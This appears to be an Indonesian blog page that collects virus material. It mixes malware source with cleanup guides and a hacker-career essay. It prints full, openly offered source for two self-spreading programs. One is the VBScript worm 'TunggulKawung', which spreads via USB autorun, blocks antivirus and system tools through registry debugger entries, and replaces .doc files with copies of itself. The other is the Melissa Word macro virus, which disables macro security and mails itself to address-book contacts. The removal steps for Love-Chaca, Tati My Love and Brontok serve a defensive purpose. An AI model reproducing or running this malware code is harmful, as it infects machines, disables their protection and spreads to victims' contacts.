Virus

Source Code TunggulKawung.VBS

Neeh Scriptnya yang banyak persamaan dari script worm lainnya:
‘ 982
‘——————————————————————–
‘ Contoh Virus Visual Basic Script
‘ Nama Virus : TunggulKawung.VBS-1
‘——————————————————————–
on error resume next
Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, autorn, filekor
Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext
Dim DesPath1, DesPath2, Scut1, Scut2
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set wsshell = CreateObject(“WScript.Shell”)
Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1)
namafile = “Tunggul.vbs”
autorn = “[autorun]“&vbcrlf&”shellexecute=wscript.exe ” & namafile
Set nask = fso.getfile(Wscript.ScriptFullname)
cekdrive = nask.drive.drivetype

Set winpath = fso.GetSpecialFolder(0)
Set sispath = fso.GetSpecialFolder(1)
Set tempath = fso.GetSpecialFolder(2)
Set text = nask.openastextstream(1, -2)
Randomize Timer
Aka=Int(rnd*1000)
Akb=Int(rnd*30)
If Akb=0 Then Akb=10
Tamb=String(Akb,”-”)
tekavir = text.readline
tekvir=”‘ “&Aka&Tamb&vbCrLf
Do While Not text.atendofstream
tekvir = tekvir&text.readline
tekvir = tekvir&vbCrLf
Loop
Shortcut()
sudah=0
Do
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(winpath & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(winpath & “\” & namafile)
filekor.Attributes = 39
For Each FlashDisk In fso.drives
If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> “A:” Then
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\” & namafile, 2, True)
filekor.write tekvir
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\” & namafile)
filekor.Attributes = 39
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & “\autorun.inf”, 2, True)
filekor.write autorn
filekor.Close
Set filekor = fso.getfile(FlashDisk.Path & “\autorun.inf”)
filekor.Attributes = 39
End If
Next
rdw=”REG_DWORD”
Smwc = “\Software\Microsoft\Windows\CurrentVersion\”
Hsmwci = “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.regwrite Hsmwci&”cmd.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”msconfig.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”regedit.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-CLN.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-RTP.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”PCMAV-SE.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”VB6.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”autorun.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”ansav.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”viremoval.exeDebugger”,” “
wsshell.regwrite Hsmwci&”avscan.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”avgnt.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”iexplore.exe\Debugger”,” “
wsshell.regwrite Hsmwci&”firefox.exe\Debugger”,” “
wsshell.regwrite “HKLM”&Smwc&”Run\WinSystem”, “wscript.exe ” & winpath & “\” & namafile
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFind”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoFolderOptions”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\Explorer\NoRun”, “1″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableRegistryTools”, “0″, rdw
wsshell.RegWrite “HKCU”&Smwc&”Policies\System\DisableTaskMgr”, “0″, rdw
wsshell.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″
If Minute(Now)=1 and sudah<>1 Then
Tularifiledoc()
sudah=1
End If
If cekdrive <> 1 Then Wscript.sleep 100000
Loop While cekdrive <> 1
Sub Tularifiledoc()
Set Drives=fso.drives
For Each Drive In Drives
If Drive<>”A:” Then
If Drive.IsReady Then
Cari Drive & “\”
End If
End If
Next
End sub
Sub Shortcut()
DesPath1 = wsshell.SpecialFolders(“Desktop”)
DesPath2 = wsshell.SpecialFolders(“StartUp”)
Set Scut1 = wsshell.CreateShortcut(DesPath1 & “\Harry Potter.lnk”)
Set Scut2 = wsshell.CreateShortcut(DesPath2 & “\Bogor Kota Hujan.lnk”)
Set Fileke1 = fso.createtextfile(sispath& “\iexplore.vbs”, 2, True)
Set Fileke2 = fso.createtextfile(tempath& “\Bogor.vbs”, 2, True)
Fileke1.Write tekvir
Fileke1.Close()
Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&”\iexplore.vbs”)
Scut1.Save
Fileke2.Write tekvir
Fileke2.Close()
Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&”\Bogor.vbs”)
Scut2.Save
End Sub
Function Cari(Path)
On Error Resume Next
Dim Folder, Subfolder, SubFolders, File, Files, filekor
Set Folder=fso.GetFolder(Path)
Set Files=Folder.Files
For Each File In Files
If fso.GetExtensionName(File.Path)=”doc” Then
namfa=fso.GetBaseName(File.Path)
Set filekor = fso.GetFile(File.Path)
filekor.Attributes = 39
Set Buatfile=fso.CreateTextFile(File.ParentFolder & “\” & namfa & “.vbs”)
Buatfile.Write tekvir
Buatfile.Close()
End If
Next
Set SubFolders=Folder.SubFolders
For Each Subfolder In Subfolders
Cari Subfolder.Path
Next
End Function


Cara Membersihkan Virus ‘Bunga Citra Lestari’

Cara Membersihkan Virus ‘Bunga Citra Lestari’
Virus Bonek atau Love-chaca memalsukan diri sebagai file gambar JPEG dengan nama ‘bunga cita lestari’. Vaksincom mendeteksi virus ini sebagai W32/SillyFDC.F, dengan ukuran file 122 KB dan ekstensi .exe.
Love-chaca sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Karena sulitnya melakukan pembersihan, maka ada beberapa langkah yang bisa anda pilih untuk membasmi virus tersebut.
Cara 1:
Pengguna komputer yang terkena virus Love-chaca bisa melakukan pembersihan dengan menjadikan drive/harddisk yang terinfeksi menjadi slave. Sebelumnya pengguna bisa me-rename file msvbvm60.dll pada direktory C:\Windows\System32, menjadi file yang diinginkan yang nantinya bisa di-rename kembali seperti semula jika virus sudah terhapus.
Untuk menghapus secara manual file-file virus yang sudah ada, anda bisa menggunakan fitur searching di Windows. Tampilkan terlebih dahulu folder Windows yang di-hidden dengan menggunakan dos command prompt. Caranya:
  • Klik [start], kemudian klik [run]
  • Ketik [cmd]
  • Pada dos prompt, ketik perintah attrib -s -h /s /d, kemudian tekan enter (sebelumnya pastikan Anda berada pada direktori C:\WINDOWS), contoh C:\WINDOWS>attrib -s -h /s /d
  • Untuk mengembalikan file yang disembunyikan di drive lain, lakukan langkah di atas tetapi sebelumnya anda ganti terlebih dahulu lokasi drive yang akan dicek [contoh D:\>attrib -s -h /s /d]
Cara 2:

Gunakan Linux Live CD seperti Knoppix/Ubuntu. Anda bisa melakukan pembersihan virus sama seperti langkah-langkah di atas yaitu dengan mencari file virus yang berukuran file 122 kb, berextension .exe dan bertipe application.
Cara 3:
Gunakan Windows Live CD/Bart PE/Mini PE. Melalui Live CD tersebut kita dapat melakukan pembersihan sekaligus melakukan repair registry yang dibuat oleh virus. Pembersihan virus tersebut tidak jauh berbeda dengan langkah-langkah di atas, hanya saja dapat kita sertai dengan repair registry yang telah dibuat oleh virus (seperti halnya membuka registry editor melalui Windows).
String yang perlu kita ubah yaitu pada :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\winlogon
Userinit = C:\windows\system32\userinit.exe
Shell = explorer.exe
System =
Ubah string registry yang terinfeksi menjadi string registry seperti diatas. Jika sudah diubah, maka restart komputer anda, dan bisa melakukan booting melalui harddisk anda yang sudah dibersihkan dan di-repair registry-nya.
Kemudian lakukan repair registry kembali untuk mengembalikan setingan windows menjadi normal. Salin script di bawah ini dengan program notepad, kemudian save as dengan nama repair.vbs (ubah save as type menjadi all types). Kemudian jalankan dengan dobel klik file tersebut.
Jika komputer anda menggunakan Windows NT/2000, ubah script berikut:
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Windows\system32\userinit.exe,”
Menjadi
oWSH.Regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit”,”C:\Winnt\system32\userinit.exe,”
Cara 4:
Hapus alamat URL yang sudah dibuat oleh W32/SillyFDC.F pada Host file Windows [C:\Windows\System32\Drivers\Etc\Host]. Untuk mempermudah proses penghapusan, anda dapat menggunakan tools “HOSTER”. Tools ini dapat di-download di alamat http://www.funkytoad.com/download/HostsXpert.zip.
Jalankan tools tersebut dan hapus alamat url yang ada dengan klik tombol “Restore Microsoft Original Host File” untuk restore Host file tersebut ke Host file asli tanpa harus memilih satu persatu alamat url yang akan dihapus.Disarankan juga untuk rajin men-scan komputer dan meng-update anti virus dengan update terbaru.




‘Bikini Bunga Citra Lestari’ Bervirus
Rupanya tak hanya Ari Lasso yang tertarik berduet dengan Bunga Citra Lestari (BCL), para pembuat virus pun menginginkannya. Kalau Ari Lasso berduet dengan BCL menghasilkan lagu yang indah, para pembuat virus berduet dengan BCL untuk menyebarkan virus maut.Bagi pembuat virus, nama BCL dinilai sangat menjual sehingga mereka pun mencatut nama tersebut untuk memancing korbannya menjalankan virus. Jika Anda sering menonton pertandingan sepakbola, tentu sudah familiar dengan kata Bonek (Bondo Nekat), yang identik sebagai sekelompok pendukung sepakbola bermodal nekat dari Surabaya. Saat ini sudah beredar virus Bonek, atau yang lebih dikenal dengan nama Love-Chaca. Virus ini memalsukan diri sebagai file gambar JPEG dengan nama “Bikini Bunga Citra Lestari”. Vaksincom, melalui Norman Virus Control, mendeteksi virus Bonek Love Chaca ini sebagai W32/SillyFDC.F.
virus ini sulit untuk dimatikan baik dalam kondisi normal, safe mode maupun safe mode with command prompt. Selain itu, virus ini dapat menghapus file executable (.exe) yang dianggap dapat membahayakan dirinya, khususnya bagi yang sudah terinfeksi dan berusaha untuk mematikan proses virus tersebut.

Virus ini menyebar melalui media USB Flash, dengan mengandalkan system autoplay windows. Menurut Vaksincom, file virus ini berukuran sekitar 122 KB dengan tipe file application (.exe). Jika dijalankan, maka virus akan membuat sebuah file yaitu “school is hell.doc” pada folder My Documents.
Untuk mempertahankan dirinya, Love Chaca juga akan membuat beberapa file virus yang akan dijalankan setiap kali komputer dinyalakan atau komputer di-restart.
Men-Disable Fungsi Windows
Seperti umumnya virus-virus lokal, Love Chaca juga akan menonaktifkan beberapa fungsi windows seperti Hidden Drive USB, Disable Find, Disable Run, Disable Registry Editor, Disable Task Manager, Disable Command Prompt, Disable Control Panel, Disable Explorer Context Menu dan Disable Taskbar Context Menu.
Love Chaca juga akan mengalihkan fungsi program menjadi Notepad. Virus ini juga akan mengalihkan beberapa fungsi dari program aplikasi dan windows termasuk Registry Editor dan Task Manager.
Salah satu yang diubah oleh Love Chaca juga termasuk tampilan folder option dan properties dari sistem. Jika terinfeksi, maka system properties akan ditambahkan gambar berupa gambar seorang laki-laki memakai jas dan topi yang wajahnya ditutupi buah.
Virus ini pun akan mencoba memblokir beberapa situs keamanan ternama, diantaranya vaksin.com, avast.com, mcafee.com, grisoft.com, symantec.com, secunia.com, f-secure.com, kaspersky.com, friendster.com, yahoo.com, google.com, google.co.id.
Bahkan, saat korban akan membuka browser Internet Explorer, maka akan muncul peringatan seolah-olah komputer kita akan di format.


‘Tati My Love’, Ungkapan Rasa untuk Sang Kekasih
Baru beberapa hari saja pengguna komputer dikagetkan oleh keberadaan virus ‘bikini bunga citra lestari’, virus lokal kembali menunjukkan taringnya.Adalah Tati My Love, virus yang menyembunyikan folder/subfolder dan membuat file duplikat di dalam flash disk. Jika Anda menemukan file dengan nama tati.my.love.txt pada flash disk atau tiba-tiba semua folder berubah menjadi berekstensi SCR (Screen Saver), segera cek komputer Anda karena kemungkinan virus sudah menginfeksi komputer. Secara umum, virus berukuran 198 KB ini sebenarnya tidak terlalu jahat karena tidak merusak data. Tati.my.love merupakan virus yang paling banyak menyebar di Indonesia. Sebenarnya Tati sudah menyebar sejak Desember 2007, dan diperkirakan ribuan komputer di Indonesia sudah terinfeksi virus ini. Puncak penyebarannya diperkirakan akan terjadi pada kuartal pertama 2008.

Untuk mengelabui user, virus ini akan menggunakan icon menyerupai Folder dengan ukuran 198 KB. Oleh Norman Virus Control, virus ini terdeteksi sebagai Trojan:W32/Autorun.AQK.
Jika sudah menginfeksi komputer, virus ini akan membuat beberapa file induk dengan nama tati.exe di 2 lokasi yaitu di C:\Windows dan C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
Virus ini juga akan membuat string pada beberapa registry, sehingga jika user mengakses ke Drive maka secara tidak langsung akan menjalankan virus. Untuk varian awalnya, Tati My Love tidak akan melakukan blok terhadap fungsi Windows sehingga lebih mudah untuk dibersihkan.
Memalsukan diri sebagai folder
Perlu diwaspadai juga, jika Anda menemukan folder yang agak aneh di dalam flash disk, seperti folder dengan ekstensi SCR, dengan type “Screensaver” dan ukuran 198 KB, sebaiknya jangan dieksekusi karena virus ini akan melakukan penipuan dengan membuat file duplikat di dalam flash disk tersebut pada setiap folder dan subfolder.
Perlu diketahui, folder yang asli tidak akan memiliki ukuran (size), tipe dan tidak memiliki ekstensi. File duplikat yang dibuat akan mempunyai nama file yang sama dengan nama folder aslinya tetapi mempunyai ekstensi .SCR (screen saver) sedangkan folder asli tersebut akan disembunyikan.
Tati My Love juga akan membuat file Autorun.inf dan file tati.exe pada flash disk dengan tujuan agar virus dapat aktif secara otomatis dengan hanya mencolokkan flash disk tersebut ke komputer. File Autorun.inf ini berisi script untuk menjalankan file tati.exe tersebut.
Tati My Love pun akan membuat sebuah file dengan nama tati.my.love.txt yang berisi ungkapan perasaan kepada sang kekasih dengan bunyi seperti ini:
Duhai Adinda tercinta —-
Perjalanan tiga hari tiga malam mengarungi samudera
——-Seumur hidup diri ini takkan lupa



Virus ini bertipe worm (dapat menduplikasi diri), dan menyebar melalui attachment email (email virus). Nama lain virus: brorontok, Rontokbro,..
Virus ini kira2 pertama kali menyebar di bulan September 2005, dibuat oleh
orang Indonesia karena signature email nya berbahasa Indonesia
dan juga saya melihat isi virus dalam binari dan dan menemukan
nama-nama fungsi dalam kode ascii merupakan kata-kata bahasa Indonesia
seperti keluarDOng(), dsb…
Alasan saya menulis artikel ini adalah karena banyaknya teman-teman
saya yang terkena virus ini
==========================================================
Langkah-langkah membersihkan komputer dari virus Barontok:
==========================================================

(Untuk win 95, 98, ME)
- Masuk ke safe mode: Reboot lalu setelahh muncul tampilan bios
tekan Ctrl, pilih Safe mode dan tekan enter
- Lanjut langsung mulai dari langkah 5
(Untuk windows ME dan XP)
Matikan System Restore Windows
Start->Settings->Control panel->System atau
Start->Control PAnel->System
pada System restore tab… pilih opsi “Turn off System Restore”
(Untuk Win 2000, XP Home/Pro, Server 2003)
1. Reboot dan masuk ke safe mode.
** Restart windows, setelah muncul tampilan BIOS tekan F8, akan ad
pilihan: Safe mode, Normal,…. pilih safe mode lalu tekan enter
2. Setelah itu masuk windows dengan login administrator atau user lain yang
mempunyai auth sebagai administrator,
3. Buat User account baru DENGAN account type: Computer Administrator
lalu logoff dan login dengan account yang baru dibuat.
——————————————
Menghilangkan autostart virus di registry
——————————————
4. Buka regedit: Start menu->Run->Regedit.exe lalu tekan enter
Di panel kiri pilih key:
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Bron-Spizaetus = “……..”
Di panel kiri pilih key:
HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Tok-Cirrhatus = “……”
** Catatan:
Jika regedit tidak dapat dibuka (muncul pesan error).. ini merupakan
salah satu akibat virus barontok.
Untuk itu saya telah membuat file untuk mengatasi masalah tsb:
Download file PatchRegKey.inf (600 Bytes) di :
http://students.if.itb.ac.id/~if12031/kios/PatchRegKey.inf
Setelah di download, klik kanan file tsb lalu pilih “Install..”
lalu lanjutkan langkah 4.
————————————————
Menghilangkan autostart virus di scheduled task
————————————————
5. Buka Secheduled Task di Control Panel:
Start->Settings->Control Panel->Scheduled Task lalu tekan enter
Hapus task dengan nama “At1″ atau apapun yang berhubungan dengan virus.
Tips: Klik kanan task->properties, lalu lihat isi properties dan jika
ad isi command yang mencurigakan contoh: BArontok.com , dsb.. hapus
task tersebut.
———————————————————
Cari dan Hapus file-file virus di seluruh drive komputer
———————————————————
6. Aktifkan opsi Show hidden Files dan Ekstensi:
Start->Settings->Control panel atau
Start->Control Panel
Klik Folder Options dan pada Tab view aktifkan opsi:
1. Show hidden files&Folders
dan matikan opsi
2. Hide Extensions for known file types
3. Hide Protected Operating System
7. Gunakan Search File Windows:
Start->Search lalu tekan enter
Cari di seluruh drive windows yang ad: C,D, ….
pada input Search for files or folders names masukkan:
*.exe
lalu pada search options pilih opsi Range Size-> At most: 81 Kb
dan pada Advanced Options pilih opsi Search system folders,
search hidden files&folders, search subfolders
pilihan lain biarkan kosong
Lalu klik search now..
Pada hasil pencarian di panel kanan hapus semua file yang:
1. berukuran TEPAT 80 kb DAN
2. file nya berekstensi *.exe / *.pif / *.com / *.bat DAN
3. File nya memiliki icon folder/direktori windows
** perhatian: hapus hanya file yang memenuhi SEMUA kondisi di atas
dan BUKAN yang memenuhi salah satu saja.
(File yang sering ditemukan: Barontok.com, ElnorB.exe ,cari file ini)
* Tips: Sort hasil pencarian berdasarkan size untuk memudahkan
penghapusan
* Catatan: Cara ini merupakan cara heuristic berdasarkan pengalaman
dan eksperimen (e.g: ditemukan bahwa virus tsb berukuran 80 Kb),
dipilih untuk pencarian lebih cepat dibandingkan melihat pattern file
satu2 secara manual
** Sorry, i don’t have time to write the removal program now
maybe next time
7. Ulangi langkah ke-7 atas dengan input search file: *.pif, *.com, *.bat
————-
Finishing
————-
8. Jika ada, Hapus semua shortcut virus Startup Menu di
setiap account profile:
C:/Document Settings/nama_profile/Start Menu/Programs/Startup
** Saran: jika memungkinkan misal pada komputer pribadi dan bukan
multi user, hapus user account selain user account
yang dibuat pada langkah 3 di atas (misal:Administrator,…).
9. Reboot dan masuk windows seperti biasa.
Catatan:
Cara ini sudah BERHASIL diterapkan di banyak komputer
(pastikan Anda sudah mengikuti semua langkah di atas)

END



berikut ini adalah source code dari virus mellisa dimana dibuat dengan VBS, mau tau so nikmati sajian ini
source code i love u
by : badboy
suntingan : virologi
Private Sub AutoOpen()
On Error Resume Next
p$ = “clone”
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “” Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else

p$ = “clone”
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1): Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo” Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” & Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t show anyone else
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”
Next y
DasMapiName.Logoff
End If
p$ = “clone”
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) = “… by Kwyjibo”
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> “Melissa” Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = “Melissa”
DoAD = True
End If
If NTI1.Name <> “Melissa” Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = “Melissa”
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = “”
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Close()”)
Do While ADI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = “clone”
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = “”
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Open()”)
Do While NTI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, “Document”) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, “Document”) <> False) Then
ActiveDocument.Saved = True: End If
‘WORD/Melissa written by Kwyjibo
‘Clone written by Duke/SMF
‘Works in both Word 2000 and Word 97
‘Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
‘Word -> Email | Word 97 <–> Word 2000 … it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game’s over. I’m outta here.”
End Sub







 


















hacker

08.27 by 1hacker's 0 komentar
ANDA INGIN MENJADI SEORANG HACKER, TAPI TIDAK MENGETAHUI BAGAIMANA CARANYA?
Pertama kali, saya akan menciutkan nyali siapapun yang ingin menjadi seorang hacker, hanya karena dia pikir hal tersebut sangat ‘keren’. Anda tidak akan menjadi sangat produktif jika hal tersebut merupakan kendaraan anda. Hal lainnya adalah jangan menjadi bodoh dan menggunakan pre-made script “kiddiot” seperti winnuke, subseven, atau msadc (script ini sangat populer saat saya menulisnya, sekarang adalah unicode). Dan tidak melakukan hal-hal yang bodoh seperti melakukan ‘hack’ untuk mendeface website atau merusak data-data orang lain. Ini namanya kekacauan dan akan menimbulkan benih kebencian, jadi jangan lakukan! Ada banyak kegiatan hacking daripada sekedar mendeface dan merusak komputer orang.
Hal pertama saya akan memetakan sedikit hal yang anda harus ketahui, dengan tujuan untuk apakah hacking itu sejatinya. Anda tidak dapat sekedar membaca tutorial sederhana para hacker dan merasa cukup, itulah mengapa saya sarankan agar membeli bukunya. Dengan tujuan untuk memahami segala sesuatunya. Lainnya, saya sarankan untuk mempelajari pertamakali mengenai ‘Networking’ (Jaringan Komputer). Seperti Network+, A Guide to Networking adalah buku yang bagus untuk para pemula. Upaya sungguh-sungguh tidaklah sekedar membaca buku tersebut, tapi juga memahaminya. Setelah anda membaca buku mengenai Networking secara umum, Perdalam pemahaman anda mengenai TCP/IP. Membaca suatu buku khusus TCP/IP akan meningkatkan pengetahuan lebih baik.

TCP/IP adalah protokol dasar pada internet, dan ketidakpahaman tentang hal ini berarti keterampilan hacking anda terlalu minim. Mempelajari Networking dan TCP/IP merupakan pelengkap anda serta dasar pemahaman dari bagaimana dan mengapa berbagai jenis serangan yang berbeda bekerja. Hal ini menjadikan pemrograman socket anda lebih mudah.
Setelah anda mempelajari keterampilan dasar Networking, bergeraklah ke UNIX. Kata ini mungkin rada-rada menakutkan bagi anda, namun pengetahuan ini mutlak harus dimiliki oleh para hacker. Jalan terbaik untuk mempelajarinya adalah menginstall sistem operasi UNIX pada komputer anda.
Mandrake dan Red Hat adalah 2 distro yang umum digunakan para pemula, dan saya anggap itu adalah alasan yang baik. Kedua distro ini sangat baik dalam mengantar perjalanan anda menuju luasnya dunia *NIX (*NIX disini dimaksudkan untuk seluruh OS mirip Unix). Jika anda membutuhkan suatu buku mengenai Unix, saya sarankan Unix pada suatu Nutshell atau Linux. Terdapat banyak sekali trial and error yang berhubungan dengan dunia Linux. Jalan terbaik adalah mencoba hal-hal yang baru dan lihat apa yang terjadi. Saya sarankan anda memulainya tanpa menggunakan Xwindows. Karena hal ini mengijinkan anda untuk mempelajari lebih jauh, serta menunjukkan kekuatan dan fleksibilitas yang dimiliki Linux. Ingatlah, kegiatan Hacking tidak memiliki GUI (Graphical User Interface) yang bagus. Semuanya didominasi baris perintah dan Pemrograman ;)
Langkah berikutnya yang paling utama, adalah suatu lompatan. Lompatan menuju dunia pemrograman yang sangat sukar, seringkali membuat frustasi dan putus asa, sungguh suatu jalan yang panjang dan lama. Dan… tidak ada jalan pintas untuk hal ini.
Menguasai sekedar Visual Basic atau Pemrograman Batch, cuman dapat melakukan sedikit hacking dengan hal ini. Bahasa C dan Perl adalah bahasa wajib bagi para hacker dikarenakan kemampuan yang powerful dan jangkauannya luas. Meskipun harus mengetahui berbagai bahasa pemrograman, tapi saya hanya menyarankan anda untuk menguasai beberapa bahasa pemrograman, seperti bahasa C, Perl, PHP, ASP dan Java.
Bahasa C mengijinkan anda dalam menemukan celah keamanan suatu program, dan banyaknya eksploit yang ditulis dalam bahasa C. Sedangkan Perl, PHP, ASP dan Java menjadikan anda mengetahui adanya celah keamanan pada script yang dijalankan di internet.
Pelajari tahap-tahap pemrograman dengan seksama, pastikan bahwa anda mengetahuinya dengan sangat baik sebelum melanjutkan. Ingatlah, kebanyakan para hacker adalah programmer yang sangat tangguh. Kembali pada mengetahui bagaimana hal tersebut bekerja, jika anda mengetahui bagaimana suatu Network, Sistem Operasi dan Program tersebut bekerja, anda bisa menemukan cara memanipulasi segala sesuatu dan melakukan apapun yang anda inginkan.
Semua yang dijelaskan diatas perlu anda pelajari selama berbulan-bulan, jadi jangan disibukkan bagaimana langkah selanjutnya. Saya sudah mencoba mempelajari tentang sekuriti sebelum saya memiliki suatu buku. Kebanyakan dari anda seringkali membaca tutorial dan tutorial dari perhackingan serta berbagai Security Paper, tapi buta sama sekali dan tidak memahami mengapa dan bagaimana hal tersebut bekerja. Saya katakan bahwa anda pertama kali anda belajar mengenai computer, kemudian tentang sekuriti. Saya memperhatikan banyak orang-orang pada channel hacking di IRC dan situs-situs hacker yang tidak mengetahui apapun tentang dunia komputer… tapi ingin menjadi hacker :(
Anda harus mempelajari bagaimana menggunakan suatu komputer dan mengetahui bagaimana hal tersebut bekerja, sebelum mempelajari bagaimana mem-bypass sekuriti dan mematahkannya. Sebuah ujian yang baik adalah, JIKA ANDA TIDAK MENGETAHUI BAGAIMANA MEMBUAT PROGRAM YANG BAIK, JANGANLAH ANDA BERMIMPI UNTUK MENJADI SEORANG HACKER!
Sebagaimana mempelajari tentang sekuriti, saya sarankan anda membaca buku Maximum Security, sebuah buku yang sangat bagus untuk para pemula. Anda harus mengetahui cara melindungi segala sesuatunya. Jangan bersusah-payah dengan berbagai program yang ditampilkan dalam buku, dan jangan mendownload sebuah “hacking tool” tunggal. Kebanyakan hal ini menjadikan komputer anda terinfeksi trojan. Setelah anda mempelajari secukupnya untuk mengetahui apakah tool yang anda perlukan untuk hacking, selanjutnya mencoba beberapa tool seperti Packet Sniffer atau Wingate Scanner.
Sekali anda mengetahui dasar-dasarnya, cobalah membaca milis buqtraq untuk melihat para ahli sekuriti berbicara, dan cara hacking sejatinya. Pada dasarnya mereka satu sama lain menemukan suatu bug dan melihat tanda-tanda yang bisa jadi suatu masalah sekuriti, atau mereka melihatnya melalui kode sumber dan menemukan celah keamanan pada ‘coding’ yang buruk.
Semua ini mungkin terlihat mudah, maksud saya ini hanyalah sedikit pembahasan. Yang jelas anda harus membaca dan memahami konsep yang tersurat sebelum melangkah ke bagian selanjutnya. Atau, anda tidak akan belajar banyak dari topik lanjutan karena anda tidak memiliki kemauan kuat. Setelah berbulan-bulan membaca dan bereksperimen, saya sarankan anda mulai membaca tentang “exploits and security holes” (Eksploitasi dan Berbagai Celah Keamanan). Inilah saat dimana sesuatu mulai melenceng dari jalur sebenarnya. Saat anda mengetahui bahwa terkadang apa yang telah anda pelajari sangat berbeda dengan kenyataan sebenarnya.
